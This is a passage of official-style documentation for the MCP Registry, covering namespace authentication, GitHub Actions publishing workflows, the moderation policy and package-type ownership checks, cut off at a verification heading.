The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
The MCP Registry is the official centralized metadata repository for publicly accessible MCP servers, backed by major trusted contributors to the MCP ecosystem such as Anthropic, GitHub, PulseMCP, and Microsoft.
The MCP Registry provides:
* A single place for server creators to publish metadata about their servers
* Namespace management through DNS verification
* A REST API for MCP clients and aggregators to discover available servers
* Standardized installation and configuration information
Server metadata is stored in a standardized [`server.json` format](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/server-json/server.schema.json), which contains:
* The server's unique name (e.g., `io.github.user/server-name`)
* Where to locate the server (e.g., npm package name, remote server URL)
* Execution instructions (e.g., command-line args, env vars)
* Other discovery data (e.g., description, server capabilities)
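For illustration, a minimal `server.json` entry might look like the sketch below. The field names here are indicative only; the linked schema is the authoritative reference:

```json theme={null}
{
  "name": "io.github.example/weather",
  "description": "Illustrative example entry; see the linked server.json schema",
  "version": "1.2.0",
  "packages": [
    {
      "registryType": "npm",
      "identifier": "weather-mcp",
      "version": "1.2.0"
    }
  ]
}
```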
## The MCP Registry Ecosystem
The MCP Registry is part of a broader ecosystem:
### Relationship with Package Registries
Package registries — such as npm, PyPI, and Docker Hub — host packages with code and binaries.
The MCP Registry hosts metadata that points to those packages.
For example, a `weather-mcp` package could be hosted on npm, and metadata in the MCP Registry could map the "weather v1.2.0" server to `npm:weather-mcp`.
The [Package Types guide](./package-types.mdx) lists the supported package types and registries. More package registries may be supported in the future based on community demand. If you are interested in building support for a package registry, please [open an issue](https://github.com/modelcontextprotocol/registry).
### Relationship with Server Developers
The MCP Registry supports both open-source and closed-source servers. Server developers can publish their server's metadata to the registry as long as the server's installation method is publicly available (e.g., an npm package or a Docker image on a public registry) *or* the server itself is publicly accessible (e.g., a remote server that is not restricted to private networks).
The MCP Registry **does not** support private servers. Private servers are those that are only accessible to a narrow set of users. For example, servers published on a private network (like `mcp.acme-corp.internal`) or on private package registries (e.g. `npx -y @acme/mcp --registry https://artifactory.acme-corp.internal/npm`). If you want to publish private servers, we recommend that you host your own private MCP registry and add them there.
### Relationship with Downstream Aggregators
The MCP Registry is intended to be consumed primarily by downstream aggregators, such as MCP server marketplaces.
The metadata hosted by the MCP Registry is deliberately unopinionated. Downstream aggregators can provide curation or additional metadata such as community ratings.
We expect that downstream aggregators will use the MCP Registry API to pull new metadata on a regular but infrequent basis (for example, once per hour). See the [MCP Registry Aggregators guide](./registry-aggregators.mdx) for more information.
### Relationship with Other MCP Registries
In addition to a public REST API, the MCP Registry defines an [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) that other MCP registries can implement in order to provide a standardized interface for MCP host applications.
We expect that many downstream aggregators will implement this interface. Private MCP registries can implement it as well to benefit from existing host application support.
Note that the official MCP Registry codebase is **not** designed for self-hosting, and the registry maintainers cannot provide support for this use case. If you choose to fork it, you would need to maintain and operate it independently.
### Relationship with MCP Host Applications
The MCP Registry is not intended to be directly consumed by host applications. Instead, host applications should consume other MCP registries, such as downstream marketplaces, via a REST API conforming to the official MCP Registry's OpenAPI spec.
## Trust and Security
### Verifying Server Authenticity
The MCP Registry uses namespace authentication to ensure that servers come from their claimed sources. Server names follow a reverse DNS format (like `io.github.username/server` or `com.example/server`) that ties them to verified GitHub accounts or domains.
This namespace system ensures that only the legitimate owner of a GitHub account or domain can publish servers under that namespace, providing trust and accountability in the ecosystem. For details on authentication methods, see the [Authentication guide](./authentication.mdx).
### Security Scanning
The MCP Registry delegates security scanning to:
* **Underlying package registries** — npm, PyPI, Docker Hub, and other package registries perform their own security scanning and vulnerability detection.
* **Downstream aggregators** — MCP Registry aggregators and marketplaces can implement additional security checks, ratings, or curation.
The MCP Registry focuses on namespace authentication and metadata hosting, while relying on the broader ecosystem for security scanning of actual server code.
### Spam Prevention
The MCP Registry uses multiple mechanisms to prevent spam:
* **Namespace authentication requirements** — Publishers must verify ownership of their namespace through GitHub, DNS, or HTTP challenges, preventing arbitrary spam submissions.
* **Character limits and validation** — Free-form fields have strict character limits and regex validation to prevent abuse.
* **Manual takedown** — The registry maintainers can manually remove spam or malicious servers. See the [Moderation Policy](./moderation-policy.mdx) for details on what content is removed.
Future spam prevention measures under consideration include stricter rate limiting, AI-based spam detection, and community reporting capabilities.
# How to Authenticate When Publishing to the Official MCP Registry
Source: https://modelcontextprotocol.io/registry/authentication
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
You must authenticate before publishing to the official MCP Registry. The MCP Registry supports different authentication methods. Which authentication method you choose determines the namespace of your server's name.
If you choose GitHub-based authentication, your server's name in `server.json` **MUST** be of the form `io.github.username/*` (or `io.github.orgname/*`). For example, `io.github.alice/weather-server`.
If you choose domain-based authentication, your server's name in `server.json` **MUST** be of the form `com.example.*/*`, where `com.example` is the reverse-DNS form of your domain name. For example, `io.modelcontextprotocol/everything` (for the domain `modelcontextprotocol.io`).
| Authentication | Name Format | Example Name |
| -------------- | ----------------------------------------------- | ------------------------------------ |
| GitHub-based | `io.github.username/*` or `io.github.orgname/*` | `io.github.alice/weather-server` |
| Domain-based   | `com.example.*/*`                                | `io.modelcontextprotocol/everything` |
## GitHub Authentication
GitHub authentication uses an OAuth flow initiated by the `mcp-publisher` CLI tool.
To perform GitHub authentication, navigate to your server project directory and run:
```bash theme={null}
mcp-publisher login github
```
You should see output like:
```text Output theme={null}
Logging in with github...
To authenticate, please:
1. Go to: https://github.com/login/device
2. Enter code: ABCD-1234
3. Authorize this application
Waiting for authorization...
```
Visit the link, follow the prompts, and enter the authorization code that was printed in the terminal (e.g., `ABCD-1234` in the above output). Once complete, go back to the terminal, and you should see output like:
```text Output theme={null}
Successfully authenticated!
✓ Successfully logged in
```
## DNS Authentication
DNS authentication is a domain-based authentication method that relies on a DNS TXT record.
To perform DNS authentication using the `mcp-publisher` CLI tool, run the following commands in your server project directory to generate a TXT record based on a public/private key pair:
```bash Ed25519 theme={null}
MY_DOMAIN="example.com"
# Generate public/private key pair using Ed25519
openssl genpkey -algorithm Ed25519 -out key.pem
# Generate TXT record
PUBLIC_KEY="$(openssl pkey -in key.pem -pubout -outform DER | tail -c 32 | base64)"
echo "${MY_DOMAIN}. IN TXT \"v=MCPv1; k=ed25519; p=${PUBLIC_KEY}\""
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
# Generate public/private key pair using ECDSA P-384
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:secp384r1 -out key.pem
# Generate TXT record
PUBLIC_KEY="$(openssl ec -in key.pem -text -noout -conv_form compressed | grep -A4 "pub:" | tail -n +2 | tr -d ' :\n' | xxd -r -p | base64)"
echo "${MY_DOMAIN}. IN TXT \"v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}\""
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
# Log in using gcloud CLI (https://cloud.google.com/sdk/docs/install)
gcloud auth login
# Set default project
gcloud config set project "${MY_PROJECT}"
# Create a keyring in your project
gcloud kms keyrings create "${MY_KEYRING}" --location global
# Create an Ed25519 signing key
gcloud kms keys create "${MY_KEY_NAME}" --default-algorithm=ec-sign-ed25519 --purpose=asymmetric-signing --keyring="${MY_KEYRING}" --location=global
# Enable Application Default Credentials (ADC) so the publisher tool can sign
gcloud auth application-default login
# Attempt login to show the public key
mcp-publisher login dns google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
# Copy the "Expected proof record":
# ${MY_DOMAIN}. IN TXT "v=MCPv1; k=ed25519; p=${PUBLIC_KEY}"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_SUBSCRIPTION="subscription name or ID"
MY_RESOURCE_GROUP="MyResourceGroup"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
# Log in using Azure CLI (https://learn.microsoft.com/en-us/cli/azure/install-azure-cli)
az login
# Set default subscription
az account set --subscription "${MY_SUBSCRIPTION}"
# Create a resource group
az group create --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create a key vault
az keyvault create --name "${MY_KEY_VAULT}" --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create an ECDSA P-384 signing key
az keyvault key create --name "${MY_KEY_NAME}" --vault-name "${MY_KEY_VAULT}" --curve P-384
# Attempt login to show the public key
mcp-publisher login dns azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
# Copy the "Expected proof record":
# ${MY_DOMAIN}. IN TXT "v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}"
```
Then add the TXT record using your DNS provider's control panel. It may take several minutes for the TXT record to propagate. You can check propagation with a DNS lookup tool such as `dig`, shown here with the example domain:
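```bash theme={null}
# Query the TXT records for your domain; the output should include
# the "v=MCPv1; ..." record generated above
dig +short TXT example.com
```
After the TXT record has propagated, log in using the `mcp-publisher login` command: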
```bash Ed25519 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl pkey -in key.pem -noout -text | grep -A3 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login dns --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl ec -in key.pem -noout -text | grep -A4 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login dns --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
mcp-publisher login dns google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
mcp-publisher login dns azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
```
## HTTP Authentication
HTTP authentication is a domain-based authentication method that relies on a `/.well-known/mcp-registry-auth` file hosted on your domain. For example, `https://example.com/.well-known/mcp-registry-auth`.
To perform HTTP authentication using the `mcp-publisher` CLI tool, run the following commands in your server project directory to generate an `mcp-registry-auth` file based on a public/private key pair:
```bash Ed25519 theme={null}
# Generate public/private key pair using Ed25519
openssl genpkey -algorithm Ed25519 -out key.pem
# Generate mcp-registry-auth file
PUBLIC_KEY="$(openssl pkey -in key.pem -pubout -outform DER | tail -c 32 | base64)"
echo "v=MCPv1; k=ed25519; p=${PUBLIC_KEY}" > mcp-registry-auth
```
```bash ECDSA P-384 theme={null}
# Generate public/private key pair using ECDSA P-384
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:secp384r1 -out key.pem
# Generate mcp-registry-auth file
PUBLIC_KEY="$(openssl ec -in key.pem -text -noout -conv_form compressed | grep -A4 "pub:" | tail -n +2 | tr -d ' :\n' | xxd -r -p | base64)"
echo "v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}" > mcp-registry-auth
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
# Log in using gcloud CLI (https://cloud.google.com/sdk/docs/install)
gcloud auth login
# Set default project
gcloud config set project "${MY_PROJECT}"
# Create a keyring in your project
gcloud kms keyrings create "${MY_KEYRING}" --location global
# Create an Ed25519 signing key
gcloud kms keys create "${MY_KEY_NAME}" --default-algorithm=ec-sign-ed25519 --purpose=asymmetric-signing --keyring="${MY_KEYRING}" --location=global
# Enable Application Default Credentials (ADC) so the publisher tool can sign
gcloud auth application-default login
# Attempt login to show the public key
mcp-publisher login http google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
# Copy the "Expected proof record" to `./mcp-registry-auth`:
# v=MCPv1; k=ed25519; p=${PUBLIC_KEY}
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_SUBSCRIPTION="subscription name or ID"
MY_RESOURCE_GROUP="MyResourceGroup"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
# Log in using Azure CLI (https://learn.microsoft.com/en-us/cli/azure/install-azure-cli)
az login
# Set default subscription
az account set --subscription "${MY_SUBSCRIPTION}"
# Create a resource group
az group create --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create a key vault
az keyvault create --name "${MY_KEY_VAULT}" --location westus --resource-group "${MY_RESOURCE_GROUP}"
# Create an ECDSA P-384 signing key
az keyvault key create --name "${MY_KEY_NAME}" --vault-name "${MY_KEY_VAULT}" --curve P-384
# Attempt login to show the public key
mcp-publisher login http azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
# Copy the "Expected proof record" to `./mcp-registry-auth`:
# v=MCPv1; k=ecdsap384; p=${PUBLIC_KEY}
```
Then host the `mcp-registry-auth` file at `/.well-known/mcp-registry-auth` on your domain. You can confirm the file is reachable with `curl`, shown here with the example domain:
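```bash theme={null}
# The response body should be the "v=MCPv1; ..." record generated above
curl "https://example.com/.well-known/mcp-registry-auth"
```
After the file is hosted, log in using the `mcp-publisher login` command: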
```bash Ed25519 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl pkey -in key.pem -noout -text | grep -A3 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login http --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash ECDSA P-384 theme={null}
MY_DOMAIN="example.com"
PRIVATE_KEY="$(openssl ec -in key.pem -noout -text | grep -A4 "priv:" | tail -n +2 | tr -d ' :\n')"
mcp-publisher login http --domain "${MY_DOMAIN}" --private-key "${PRIVATE_KEY}"
```
```bash Google KMS theme={null}
MY_DOMAIN="example.com"
MY_PROJECT="myproject"
MY_KEYRING="mykeyring"
MY_KEY_NAME="mykey"
mcp-publisher login http google-kms --domain="${MY_DOMAIN}" --resource="projects/${MY_PROJECT}/locations/global/keyRings/${MY_KEYRING}/cryptoKeys/${MY_KEY_NAME}/cryptoKeyVersions/1"
```
```bash Azure Key Vault theme={null}
MY_DOMAIN="example.com"
MY_KEY_VAULT="MyKeyVault"
MY_KEY_NAME="MyKey"
mcp-publisher login http azure-key-vault --domain="${MY_DOMAIN}" --vault "${MY_KEY_VAULT}" --key "${MY_KEY_NAME}"
```
# Frequently Asked Questions
Source: https://modelcontextprotocol.io/registry/faq
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
## General
### What is the difference between "Official MCP Registry", "MCP Registry", "MCP registry", "MCP Registry API", etc?
* "MCP Registry API" — An API that implements the [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) defined by the MCP Registry.
* "Official MCP Registry API" — The REST API served at `https://registry.modelcontextprotocol.io`, which is a superset of the MCP Registry API. Its OpenAPI spec can be downloaded from [https://registry.modelcontextprotocol.io/openapi.yaml](https://registry.modelcontextprotocol.io/openapi.yaml).
* "MCP registry" — A third-party service that provides an MCP Registry API.
* "Official MCP Registry" (or "The MCP Registry") — The service that lives at `https://registry.modelcontextprotocol.io`.
### Can I delete/unpublish my server?
Currently, no. At the time of writing, this capability is under [open discussion](https://github.com/modelcontextprotocol/registry/issues/104).
### How do I update my server metadata?
Submit a new `server.json` with a unique version string. Once published, version metadata is immutable (similar to npm).
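For example, a metadata-only update just bumps the version in `server.json` before re-running `mcp-publisher publish` (a minimal sketch):
```diff server.json theme={null}
- "version": "1.0.0",
+ "version": "1.0.1",
```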
### Can I add custom metadata when publishing?
Yes, custom metadata under `_meta.io.modelcontextprotocol.registry/publisher-provided` is preserved when publishing to the registry. This allows you to include custom metadata specific to your publishing process.
There is a 4KB size limit (4096 bytes of JSON). Publishing will fail if this limit is exceeded.
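For example, an abbreviated `server.json` could carry build details under that key (the inner field names here are illustrative, not a defined schema):
```json server.json theme={null}
{
  "name": "io.github.username/email-integration-mcp",
  "version": "1.0.0",
  "_meta": {
    "io.modelcontextprotocol.registry/publisher-provided": {
      "build_commit": "0a1b2c3",
      "release_pipeline": "https://example.com/ci/runs/42"
    }
  }
}
```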
## Reporting Issues
### What if I need to report a spam or malicious server?
1. Report it as abuse to the underlying package registry (e.g., npm, PyPI, Docker Hub); and
2. Raise a GitHub issue on the registry repo with a title beginning `Abuse report: `
### What if I need to report a security vulnerability in the registry itself?
Follow [the MCP community SECURITY.md](https://github.com/modelcontextprotocol/.github/blob/main/SECURITY.md).
# How to Automate Publishing with GitHub Actions
Source: https://modelcontextprotocol.io/registry/github-actions
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
## Step 1: Create a Workflow File
In your server project directory, create a `.github/workflows/publish-mcp.yml` file. Here is an example for an npm-based local server, but the MCP Registry publishing steps are the same for all package types:
```yaml OIDC authentication (recommended) theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
id-token: write # Required for OIDC authentication
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
- name: Authenticate to MCP Registry
run: ./mcp-publisher login github-oidc
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
```yaml PAT authentication theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
- name: Authenticate to MCP Registry
run: ./mcp-publisher login github --token ${{ secrets.MCP_GITHUB_TOKEN }}
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
```yaml DNS authentication theme={null}
name: Publish to MCP Registry
on:
push:
tags: ["v*"] # Triggers on version tags like v1.0.0
jobs:
publish:
runs-on: ubuntu-latest
permissions:
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v5
### Publish underlying npm package:
- name: Set up Node.js
uses: actions/setup-node@v5
with:
node-version: "lts/*"
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm run test --if-present
- name: Build package
run: npm run build --if-present
- name: Publish package to npm
run: npm publish
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
### Publish MCP server:
- name: Install mcp-publisher
run: |
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# TODO: Replace `example.com` with your domain name
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- name: Authenticate to MCP Registry
run: ./mcp-publisher login dns --domain example.com --private-key ${{ secrets.MCP_PRIVATE_KEY }}
# Optional:
# - name: Set version in server.json
# run: |
# VERSION=${GITHUB_REF#refs/tags/v}
# jq --arg v "$VERSION" '.version = $v' server.json > server.tmp && mv server.tmp server.json
- name: Publish server to MCP Registry
run: ./mcp-publisher publish
```
## Step 2: Add Secrets
You may need to add a secret to the repository depending on which authentication method you choose:
* **GitHub OIDC Authentication**: No dedicated secret necessary.
* **GitHub PAT Authentication**: Add an `MCP_GITHUB_TOKEN` secret containing a GitHub Personal Access Token (PAT) with the `read:org` and `read:user` scopes.
* **DNS Authentication**: Add an `MCP_PRIVATE_KEY` secret containing your Ed25519 private key.
You may also need to add secrets for your package registry. For example, the workflow above needs an `NPM_TOKEN` secret with your npm token.
For information about how to add secrets to a repository, see [Using secrets in GitHub Actions](https://docs.github.com/en/actions/how-tos/write-workflows/choose-what-workflows-do/use-secrets).
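If you use the [GitHub CLI](https://cli.github.com/), you can also set repository secrets from the terminal; a quick sketch, assuming `gh` is installed and authenticated:
```bash theme={null}
# Run from within the repository; each command prompts for the secret value
gh secret set NPM_TOKEN
gh secret set MCP_GITHUB_TOKEN  # only needed for PAT authentication
gh secret set MCP_PRIVATE_KEY   # only needed for DNS authentication
```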
## Step 3: Tag and Release
Create and push a version tag to trigger the workflow:
```bash theme={null}
git tag v1.0.0
git push origin v1.0.0
```
The workflow will run tests, build the package, publish the package to npm, and publish the server to the MCP Registry.
## Troubleshooting
| Error Message | Action |
| --------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| "Authentication failed" | Ensure `id-token: write` permission is set for OIDC, or check secrets. |
| "Package validation failed" | Verify your package successfully published to the package registry (e.g., npm, PyPI), and that your package has the [necessary verification information](./package-types.mdx). |
# The MCP Registry Moderation Policy
Source: https://modelcontextprotocol.io/registry/moderation-policy
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
**TL;DR**: The MCP Registry is quite permissive! We only remove illegal content, malware, spam, and completely broken servers.
## Scope
This policy applies to the official MCP Registry at `registry.modelcontextprotocol.io`.
Subregistries may have their own moderation policies. If you have questions about content on a specific subregistry, please contact them directly.
## Disclaimer
The MCP Registry **does not** make guarantees about moderation, and consumers should assume minimal-to-no moderation.
The MCP Registry is a community-supported project, and we have limited active moderation capabilities. We largely rely on upstream package registries (like npm, PyPI, and Docker Hub) or downstream subregistries (like the GitHub MCP Registry) to do more in-depth moderation.
This means there may be content in the MCP Registry that should be removed under this policy, but which we haven't yet removed. Consumers should treat scraped data accordingly.
## What We Remove
We will remove servers that contain:
* Illegal content, which includes obscene content, copyright violations, and hacking tools
* Malware, regardless of intentions
* Spam, especially mass-created servers that disrupt the registry. Examples:
* The same server being submitted multiple times under different names
* A server that doesn't do anything but provide a fixed response with some marketing copy
* A server with a description stuffed with marketing copy and an unrelated implementation
* Non-functioning servers
## What We Don't Remove
Generally, we believe in keeping the registry open and pushing moderation to subregistries. We therefore **won't** remove:
* Low-quality or buggy servers
* Servers with security vulnerabilities
* Servers that do the same thing as other servers
* Servers that provide or contain adult content
## How Removal Works
When we remove a server, we set the server's `status` to `"deleted"`, but the server's metadata remains accessible via the MCP Registry API. Aggregators may then remove the server from their indexes.
In extreme cases, such as when the metadata itself is unlawful, we may overwrite or erase the server's metadata.
## Appeals
Think we made a mistake? Open an issue on our [GitHub repository](https://github.com/modelcontextprotocol/registry) with:
* The name of the server
* Why you believe the server doesn't meet the above criteria for removal
## Changes to This Policy
We're still learning how best to run the MCP Registry! As such, we might end up changing this policy in the future.
# MCP Registry Supported Package Types
Source: https://modelcontextprotocol.io/registry/package-types
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
The MCP Registry supports several different package types, and each package type has its own verification method.
## npm Packages
For npm packages, the MCP Registry currently supports the npm public registry (`https://registry.npmjs.org`) only.
npm packages use `"registryType": "npm"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of npm packages by checking `mcpName` in `package.json`. The `mcpName` property **MUST** match the server name from `server.json`. For example:
```json package.json theme={null}
{
"name": "@username/email-integration-mcp",
"version": "1.0.0",
"mcpName": "io.github.username/email-integration-mcp"
}
```
## PyPI Packages
For PyPI packages, the MCP Registry currently supports the official PyPI registry (`https://pypi.org`) only.
PyPI packages use `"registryType": "pypi"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/database-query-mcp",
"title": "Database Query",
"description": "Execute SQL queries and manage database connections",
"version": "1.0.0",
"packages": [
{
"registryType": "pypi",
"identifier": "database-query-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of PyPI packages by checking for the existence of an `mcp-name: $SERVER_NAME` string in the package README (which becomes the package description on PyPI). The string may be hidden in a comment, but the `$SERVER_NAME` portion **MUST** match the server name from `server.json`. For example:
```markdown README.md highlight={5} theme={null}
# Database Query MCP Server

This MCP server executes SQL queries and manages database connections.

<!-- mcp-name: io.github.username/database-query-mcp -->
```
## NuGet Packages
For NuGet packages, the MCP Registry currently supports the official NuGet registry (`https://api.nuget.org/v3/index.json`) only.
NuGet packages use `"registryType": "nuget"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/azure-devops-mcp",
"title": "Azure DevOps",
"description": "Manage Azure DevOps work items and pipelines",
"version": "1.0.0",
"packages": [
{
"registryType": "nuget",
"identifier": "Username.AzureDevOpsMcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Ownership Verification
The MCP Registry verifies ownership of NuGet packages by checking for the existence of an `mcp-name: $SERVER_NAME` string in the package README. The string may be hidden in a comment, but the `$SERVER_NAME` portion **MUST** match the server name from `server.json`. For example:
```markdown README.md highlight={5} theme={null}
# Azure DevOps MCP Server

This MCP server manages Azure DevOps work items and pipelines.

<!-- mcp-name: io.github.username/azure-devops-mcp -->
```
## Docker/OCI Images
For Docker/OCI images, the MCP Registry currently supports:
* Docker Hub (`docker.io`)
* GitHub Container Registry (`ghcr.io`)
* Google Artifact Registry (any `*.pkg.dev` domain)
* Azure Container Registry (`*.azurecr.io`)
* Microsoft Container Registry (`mcr.microsoft.com`)
Docker/OCI images use `"registryType": "oci"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/kubernetes-manager-mcp",
"title": "Kubernetes Manager",
"description": "Deploy and manage Kubernetes resources",
"version": "1.0.0",
"packages": [
{
"registryType": "oci",
"identifier": "docker.io/yourusername/kubernetes-manager-mcp:1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
The format of `identifier` is `registry/namespace/repository:tag`. For example, `docker.io/user/app:1.0.0` or `ghcr.io/user/app:1.0.0`. The tag can also be replaced with a digest (e.g., `docker.io/user/app@sha256:<digest>`).
### Ownership Verification
The MCP Registry verifies ownership of Docker/OCI images by checking for an `io.modelcontextprotocol.server.name` annotation. The value of the `io.modelcontextprotocol.server.name` annotation **MUST** match the server name from `server.json`. For example:
```dockerfile Dockerfile theme={null}
LABEL io.modelcontextprotocol.server.name="io.github.username/kubernetes-manager-mcp"
```
## MCPB Packages
For MCPB packages, the MCP Registry currently supports MCPB artifacts hosted via GitHub or GitLab releases.
MCPB packages use `"registryType": "mcpb"` in `server.json`. For example:
```json server.json highlight={9} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/image-processor-mcp",
"title": "Image Processor",
"description": "Process and transform images with various filters",
"version": "1.0.0",
"packages": [
{
"registryType": "mcpb",
"identifier": "https://github.com/username/image-processor-mcp/releases/download/v1.0.0/image-processor.mcpb",
"fileSha256": "fe333e598595000ae021bd27117db32ec69af6987f507ba7a63c90638ff633ce",
"transport": {
"type": "stdio"
}
}
]
}
```
### Verification
